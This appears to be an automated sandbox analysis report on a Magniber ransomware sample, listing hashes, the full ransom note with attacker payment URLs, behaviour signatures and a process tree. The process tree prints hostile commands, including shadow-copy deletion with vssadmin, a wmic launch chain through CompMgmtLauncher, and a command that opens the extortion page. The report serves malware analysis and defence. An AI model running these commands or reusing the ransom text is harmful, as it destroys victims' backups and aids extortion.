Overview

overview

10

Static

static

magnibar_2...6b.exe

windows7_x64

10

magnibar_2...6b.exe

windows10_x64

10

Analysis

  • max time kernel
    300s
  • max time network
    261s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-07-2021 19:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    magnibar_2cf60c433df3dcc84b80e18c93e578bf18b31c5c49777953702c53166275796b.exe

  • Size

    21KB

  • MD5

    2953b6ec692537f8eace1077081f9e43

  • SHA1

    6db28862c0dbb589b918f812ff61cfdac0248eab

  • SHA256

    2cf60c433df3dcc84b80e18c93e578bf18b31c5c49777953702c53166275796b

  • SHA512

    11959d3841c3824e5d4c68771f67db6227423d99f5beb6559c165081b6300fb3553633ce871157bd972845730fcc9e1201c10507f114d7458b3940c8cdf0ca85

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://0a9858c862607e508kmxfykjdz.5s4ixqul2enwxrqv.onion/kmxfykjdz Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://0a9858c862607e508kmxfykjdz.bestep.cyou/kmxfykjdz http://0a9858c862607e508kmxfykjdz.plughas.casa/kmxfykjdz http://0a9858c862607e508kmxfykjdz.ownhits.space/kmxfykjdz http://0a9858c862607e508kmxfykjdz.dayhit.xyz/kmxfykjdz Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://0a9858c862607e508kmxfykjdz.5s4ixqul2enwxrqv.onion/kmxfykjdz

http://0a9858c862607e508kmxfykjdz.bestep.cyou/kmxfykjdz

http://0a9858c862607e508kmxfykjdz.plughas.casa/kmxfykjdz

http://0a9858c862607e508kmxfykjdz.ownhits.space/kmxfykjdz

http://0a9858c862607e508kmxfykjdz.dayhit.xyz/kmxfykjdz

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Users\Admin\AppData\Local\Temp\magnibar_2cf60c433df3dcc84b80e18c93e578bf18b31c5c49777953702c53166275796b.exe
      "C:\Users\Admin\AppData\Local\Temp\magnibar_2cf60c433df3dcc84b80e18c93e578bf18b31c5c49777953702c53166275796b.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:320
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1236
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:796
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:596
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1044
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
            PID:928
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies extensions of user files
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1088
        • C:\Windows\system32\notepad.exe
          notepad.exe C:\Users\Public\readme.txt
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:1584
        • C:\Windows\system32\cmd.exe
          cmd /c "start http://0a9858c862607e508kmxfykjdz.bestep.cyou/kmxfykjdz^&1^&38399440^&81^&337^&12"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1796
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://0a9858c862607e508kmxfykjdz.bestep.cyou/kmxfykjdz&1&38399440&81&337&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1924
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1924 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1684
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1520
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1432
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:528
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:1456
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:824
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:804
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1772
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2040
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:928
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1944
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
                PID:1628
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:1756
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:1016
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:456
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "2061577905-1158416065-984416716-256064404-84625758417910552512048719746202819155"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:1628
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:1160
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:1760
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                  PID:1192

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\GPFZBL30.txt
                  MD5

                  ded4887fe783f08b0647697e5eb915fb

                  SHA1

                  ef258f3e8a064e006d793d9ca4f92830619f1751

                  SHA256

                  9c4a647ea0cf783a3ce51271b4bd8ddd25058a0539377cf529f4eac3dfbd7653

                  SHA512

                  98a29ab3d30a5ca5b2d5a287824f7230d55e1677c506e6920b25322b6d5eef2edeb3b442af8ce3a1ac6d4ddc10dba3850a0d5147f38974baba2b2d80f180cd2b

                  Download Submit

                • C:\Users\Admin\Desktop\ConfirmSearch.jpe.kmxfykjdz
                  MD5

                  a3eb38a7e15a30f932fe5fcce3ec3b6f

                  SHA1

                  34ca49bdb8300a8aaad7470f3363d478ad9f7236

                  SHA256

                  0b598baa4607862892545e83f68e18e7a70a1cd292d8e3ed1023b528e517881d

                  SHA512

                  f77c14c5e0ec299440bc8842a8c813bb11683c9dfdfca5f086ae3370f938416dc9342e71fdabf5a1b192958dac547f9d44f3b5df74b6bfc25929714c8f0dbc62

                  Download Submit

                • C:\Users\Admin\Desktop\ConvertFromUnlock.php.kmxfykjdz
                  MD5

                  27df6cf1567724150d6e2cd04b3ba905

                  SHA1

                  54edd504abb3bcb2d400624548f85c276c5c48d2

                  SHA256

                  7059168f5f70d0400f73bd9aa3505cd247b157c61888b1549ef7cdb19cb9091a

                  SHA512

                  1504b225e9270a96368f41f98758fe908b2e7601edf812cf7dd49fb4bda712be7dbcc087a61809c7656dedc5da0e21b73c921d17e1b0896d80cb6c6023dc996b

                  Download Submit

                • C:\Users\Admin\Desktop\ConvertMove.tif.kmxfykjdz
                  MD5

                  c48020d010e597ad7b6ac0bd7ada1f30

                  SHA1

                  12de017b5c985cdba2ba78c1dad321b87b7671eb

                  SHA256

                  ed8103f5db48a1e757b0ebd276eba1b8c2ce4192ff78018ae9d13a3dac4dbb8e

                  SHA512

                  5e7396806cc0586baf0d05b1f6b52b9f9f5ab4a126c8638e46be566cc9ccd3707dc81f1e24c4bceba93408d7729a1596e2fc0fd1c23eff2a03a7b9fd90e146fb

                  Download Submit

                • C:\Users\Admin\Desktop\ConvertRedo.odt.kmxfykjdz
                  MD5

                  d91b92e005275bacba0efd4784be6520

                  SHA1

                  6e7114d1853711b46c0744c3f04f323cd5fa3919

                  SHA256

                  506da2da6e9ba659e902b9a7ab954d89b2d6a34bed3776f1fa7ef77280f6f6c9

                  SHA512

                  3a06d1bc56f0305d0c614319580ac260564080003ca3468762af3a13f5949d04805ef0a8e4a58a2f0433b998ec3b71f2cbb26d070ae59bd59838fbb800a13eb0

                  Download Submit

                • C:\Users\Admin\Desktop\DenyPublish.mpeg.kmxfykjdz
                  MD5

                  39ef3870b43b153b6330aef90930ef1c

                  SHA1

                  5886ef36aa19525b3ca4d950e05cb49878c85e3d

                  SHA256

                  3a0f72e986de50be02193ac45267b6121b8fc23ec97d6017063359c9414ba3c4

                  SHA512

                  92ed597860925aaa3dbcbd658945687f8ad936ba41cd13438ff584413fe20415f9d7dee4cbb0ac2c27b52ef6ec313431d6d69e6d5b57a92082f7d7dba88be89b

                  Download Submit

                • C:\Users\Admin\Desktop\ExitUpdate.vsdx.kmxfykjdz
                  MD5

                  970f061595f8a792b10fb0d7d11d390d

                  SHA1

                  21545a471402098c4a26c65d52c6c39cd3b92f4c

                  SHA256

                  9142cb7d7356178dce4d6d2f7e82f81668cf281cc1a3caf7cddea5f2e516eb80

                  SHA512

                  4ca45eb13044fb62d50b24f69812164ab5ac885d9b30a7d658fb09a4428bbc26efc80e9d4170acbc0d782d72e37c0091281c11d54a66290d78d6b3c43fa04417

                  Download Submit

                • C:\Users\Admin\Desktop\ImportUnblock.pdf.kmxfykjdz
                  MD5

                  e00b67bbc647c191074b4f34224e79f3

                  SHA1

                  a861bd81892978030fe7c79dfecea2b49539ffe5

                  SHA256

                  61230ee32a72fa15fb1a4318e3acef5e16dd0dd3d79d3ca7dc9644a814ff0a77

                  SHA512

                  d3cdbc9287c3c597c22d5157013c017a2112d663de89cbe7382eaebe2df438ecb477fd990d0a56d8f9c897838a293fdfc3f1dd6babd3946c09ea5f38e590077a

                  Download Submit

                • C:\Users\Admin\Desktop\ResizeSkip.ppt.kmxfykjdz
                  MD5

                  19f307fac3259ab7f9b38e29b398aa73

                  SHA1

                  c7f6c579476b37b8400d6832b022218ad0261531

                  SHA256

                  af200de726dfe21eb242285edfa76af1a56c897411d0f8463453c7566901bf49

                  SHA512

                  6afe632873262a906b38aade1eaec69867427d1d1b9a1c7d7a041ad19976ce50b01e60fe8fddbb0c7f4799dfab1bd812f5b13c46a574cca994b10c509168ebfc

                  Download Submit

                • C:\Users\Admin\Desktop\SplitRename.jpeg.kmxfykjdz
                  MD5

                  3837f0dde54132791e53ea3738201923

                  SHA1

                  c825e7bb6aa1dca94642134e9b61eb4b118dbc10

                  SHA256

                  1adfb4d0ffa466c1a90981ba6544eb0ab4e340a2d7b833c8c1e39c9dacaadb38

                  SHA512

                  e98ff194afcb9e892a93e4034ef1c50161404161d2b46f779e5d1b621d663b1c8dcf63c2fcc48891aacc06dc2bc25fd33a76c98308c0a1c7cd571e9881dff89a

                  Download Submit

                • C:\Users\Admin\Desktop\StepCompare.tif.kmxfykjdz
                  MD5

                  3abd2a9188f1d9bfddbf2896ee0c2c79

                  SHA1

                  629395cb19141d74beac3420af8752080ca0d99d

                  SHA256

                  09c9cd1472ed33e222aa13e7a07ff4bab936b59ae8af51c15ece92ef5c908102

                  SHA512

                  9b50edd326815642c376c80a589d00a73ef4d45d284147c44e6a17ba29079f2fdc8f775c6b044d29ba345165e3590a19953dab0fef278b6514a967abebc6c172

                  Download Submit

                • C:\Users\Admin\Desktop\TraceOpen.pot.kmxfykjdz
                  MD5

                  af4d69fcaf06a7d228f15adba29a62b2

                  SHA1

                  f0ac5738b2f9bbc2ff15f379bd9b25b96b10e967

                  SHA256

                  a0073941f9867516cb9c936b5a94bad4cbed5a9b2f19eceef735faf2896db2bd

                  SHA512

                  81b4860c9a3117f7ba673a4be59a10185bd60f9705b54f86f257789b466966389d3e464f6a43e46811ec5415ed69de62cb2dcf5d8075c35f3ca93609cde7495f

                  Download Submit

                • C:\Users\Admin\Desktop\UninstallWrite.pot.kmxfykjdz
                  MD5

                  d7f1dd62a4acdfcb6b105cc42e71dca2

                  SHA1

                  028bd9e787b02c9b10e4b3bcb655f9d955d5ccd4

                  SHA256

                  ec4375c0a9544f8b4c990fb7fe231a8ad380ea090bf1dd19da396236ac335160

                  SHA512

                  29dcd66b428b47a027882950b850ed1e7b2d86df0ffb6d56d2dc971c7b1e9bf5fd2c21d01c3bed485c05d413449bb1e72007f1a4998bc9afd92bc78683aa963c

                  Download Submit

                • C:\Users\Admin\Desktop\readme.txt
                  MD5

                  5d9f07461c2e81de7ff58c51c52c2038

                  SHA1

                  1d6bd15e618d79154b6a066ffc3cbec11812b022

                  SHA256

                  408d9482d6a27d91c512612efa6bdaebeaf8549c5fe952dacebb3ff70f501810

                  SHA512

                  83abf7da03e74b5d81b2a091e441e8a93ce56ad2da1fa95ea9b3480fe27521d2e1fbae2b3464dc51b9dffe9fa2b52181ed3e41b8b1051ed54ca1861c8388e34d

                  Download Submit

                • C:\Users\Public\readme.txt
                  MD5

                  5d9f07461c2e81de7ff58c51c52c2038

                  SHA1

                  1d6bd15e618d79154b6a066ffc3cbec11812b022

                  SHA256

                  408d9482d6a27d91c512612efa6bdaebeaf8549c5fe952dacebb3ff70f501810

                  SHA512

                  83abf7da03e74b5d81b2a091e441e8a93ce56ad2da1fa95ea9b3480fe27521d2e1fbae2b3464dc51b9dffe9fa2b52181ed3e41b8b1051ed54ca1861c8388e34d

                  Download Submit

                • memory/320-65-0x0000000001CA0000-0x0000000001CA1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-63-0x0000000000300000-0x0000000000301000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-101-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-61-0x00000000002E0000-0x00000000002E1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-62-0x00000000002F0000-0x00000000002F1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-69-0x0000000001D00000-0x0000000001D01000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-64-0x0000000001B40000-0x0000000001B41000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-71-0x0000000001D20000-0x0000000001D21000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-70-0x0000000001D10000-0x0000000001D11000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-59-0x0000000000020000-0x0000000000025000-memory.dmp

                  Filesize

                  20KB

                  Download

                • memory/320-66-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-67-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/320-68-0x0000000001CF0000-0x0000000001CF1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/596-97-0x0000000000000000-mapping.dmp

                  Download

                • memory/796-99-0x0000000000000000-mapping.dmp

                  Download

                • memory/804-110-0x0000000000000000-mapping.dmp

                  Download

                • memory/824-100-0x0000000000000000-mapping.dmp

                  Download

                • memory/928-111-0x0000000000000000-mapping.dmp

                  Download

                • memory/928-96-0x0000000000000000-mapping.dmp

                  Download

                • memory/1044-80-0x0000000000000000-mapping.dmp

                  Download

                • memory/1088-72-0x0000000001C20000-0x0000000001C24000-memory.dmp

                  Filesize

                  16KB

                  Download

                • memory/1108-105-0x0000000000000000-mapping.dmp

                  Download

                • memory/1200-60-0x00000000025E0000-0x00000000025F0000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/1236-98-0x0000000000000000-mapping.dmp

                  Download

                • memory/1432-78-0x0000000000000000-mapping.dmp

                  Download

                • memory/1456-112-0x0000000000000000-mapping.dmp

                  Download

                • memory/1520-77-0x0000000000000000-mapping.dmp

                  Download

                • memory/1524-95-0x0000000000000000-mapping.dmp

                  Download

                • memory/1584-74-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/1584-73-0x0000000000000000-mapping.dmp

                  Download

                • memory/1628-103-0x0000000000000000-mapping.dmp

                  Download

                • memory/1684-106-0x0000000000000000-mapping.dmp

                  Download

                • memory/1756-113-0x0000000000000000-mapping.dmp

                  Download

                • memory/1796-76-0x0000000000000000-mapping.dmp

                  Download

                • memory/1924-94-0x0000000000000000-mapping.dmp

                  Download

                • memory/2040-102-0x0000000000000000-mapping.dmp

                  Download